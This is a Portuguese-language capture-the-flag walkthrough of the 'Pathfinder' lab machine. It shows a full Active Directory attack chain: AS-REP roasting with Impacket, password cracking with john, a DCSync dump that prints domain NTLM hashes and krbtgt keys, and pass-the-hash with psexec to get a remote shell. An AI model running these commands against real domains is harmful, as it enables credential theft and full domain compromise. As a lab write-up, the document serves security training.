Pathfinder

IP: 10.10.10.30

Enumeration

# nmap -sC -sV -v -Pn 10.10.10.30
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-24 08:52 EDT
....................................

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-24 20:06:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h13m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-09-24T20:07:01
|_  start_date: N/A

Tudo indica que este

No laboratório passado (Shield) conseguimos obter as credenciais do AD da sandra:

Username : sandra Domain : MEGACORP.LOCAL Password : Password1234!

Vamos fazer alguns testes:

1 - checar se consigo usar as credenciais da sandra para enumerar compartilhamentos de rede:

# smbclient -U sandra -L \\\\10.10.10.30\\                                                                                                                                                    1 ⨯
Enter WORKGROUP\sandra's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

O resultado acima mostra que nossas credenciais testadas são válidas. Vamos agora checar se temos direito a gravar em algum dos diretórios listados:

# python3 /usr/share/doc/python3-impacket/examples/psexec.py megacorp/sandra:'Password1234!'@10.10.10.30                                                                                    127 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

Infelizmente o escopo do usuário "sandra" é limitado. Faremos outras tentativas.

Exploração

Vamos checar se existe algum usuário habilitado no kerberos que possa realizar algumas requisições interessantes no servidor sem necessitar autenticação por senha. O script em python GetNPUsers.py no ajuda a fazer isso. Basicamente ele tentará fazer o seguinte:

The script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). For those users with such configuration, a John The Ripper output will be generated so you can send it for cracking.

# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py megacorp.local/sandra -dc-ip 10.10.10.30
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
Name     MemberOf                                                    PasswordLastSet             LastLogon                   UAC      
-------  ----------------------------------------------------------  --------------------------  --------------------------  --------
svc_bes  CN=Remote Management Users,CN=Builtin,DC=MEGACORP,DC=LOCAL  2020-03-20 20:16:54.721477  2021-09-24 18:09:18.186634  0x400200

O usuário em questão é o svc_bes

Vamos tentar obter hashes remotante através desta falha:

# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc_bes
$krb5asrep$svc_bes@MEGACORP.LOCAL:2d18b70dd7eda2ecf0b9efa89ae71da9$d219a6999ca898106d61f8cdd10da2e2daef6f6b232f49d7ac9326c9ecb8ed8529b0b45167d9016c0766d02956dbfb1ff90adb89a11780ce4385d52fb845e84202858ee1dc25b66f94d0de223386fd70ef7516978b232f6c30a0e23d8617c75bd69e801378406428e5b2a0028e7f0a27fbd9fcb392c36edaa0688c5688c3cfb42dff5b7e7928f59c069e93a23a6dcd2c9aebfdd76a9c10038ef3c5a43fd090401557545656909f320436eb240c44cd57eebefeea7e8645eb57ba00cf81f718f10825e259178a998d58eae63fa44e614e56852d7443aef4f3317862a874eae44fee09feeb981ec18171863f9f305c7110

Feito. Conseguimos a hash do AD do usuário svc_bes. Vamos salvar a seguinte hash num arquivo texto chamado hash.txt

$krb5asrep$svc_bes@MEGACORP.LOCAL:2d18b70dd7eda2ecf0b9efa89ae71da9$d219a6999ca898106d61f8cdd10da2e2daef6f6b232f49d7ac9326c9ecb8ed8529b0b45167d9016c0766d02956dbfb1ff90adb89a11780ce4385d52fb845e84202858ee1dc25b66f94d0de223386fd70ef7516978b232f6c30a0e23d8617c75bd69e801378406428e5b2a0028e7f0a27fbd9fcb392c36edaa0688c5688c3cfb42dff5b7e7928f59c069e93a23a6dcd2c9aebfdd76a9c10038ef3c5a43fd090401557545656909f320436eb240c44cd57eebefeea7e8645eb57ba00cf81f718f10825e259178a998d58eae63fa44e614e56852d7443aef4f3317862a874eae44fee09feeb981ec18171863f9f305c7110

E agora tentaremos entar quebrar este hash através do john.

# john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:23 DONE (2021-09-24 11:09) 0.04228g/s 448330p/s 448330c/s 448330C/s Sherbear94..Sheepy04
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Agora temos então mais uma credencial válida para o host PATHFINDER:

user: svc_bes pass: Sheffield19

Aparentemente, o usuário "svc_bes" tem algumas permissões mais elevadas do que o usuário "sandra".

Vamos tentar levantar hashes de outros usuários a partir do user "svc_bes" através do secrecsdump.py

# secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30                                                                                                                                   1 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:7c7cbf1c0e343f968e74c7dd7088562c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:b695d90101bf1408c0fd67f5eb28be7e56dcf0de71c046a1e31730eb21a2b52b
PATHFINDER$:aes128-cts-hmac-sha1-96:1add94bf3b92632f195904796c37fd11
PATHFINDER$:des-cbc-md5:86d34a79d66d3d80
[*] Cleaning up...

Feito isso, temos em mãos agora o hash do usuário administrator. Poderíamos tentar quebrar ela usando o john ou o hashcat, mas também podemos usar a técnica pass the hash, onde usaremos a hash para conseguir uma shell ao invés da senha.

# psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18           
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file EtScLWQX.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service sIKp on 10.10.10.30.....
[*] Starting service sIKp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Acabamos de ganhar uma shell remota no servidor!

Pós Exploração

Basta coletar as flags do usuário comum e também do administrator.

C:\Users\svc_bes\Desktop>type user.txt
b05fb166688a8603d970c6d033f637f1
C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645

PreviousShieldNextEasyMachine02

Last updated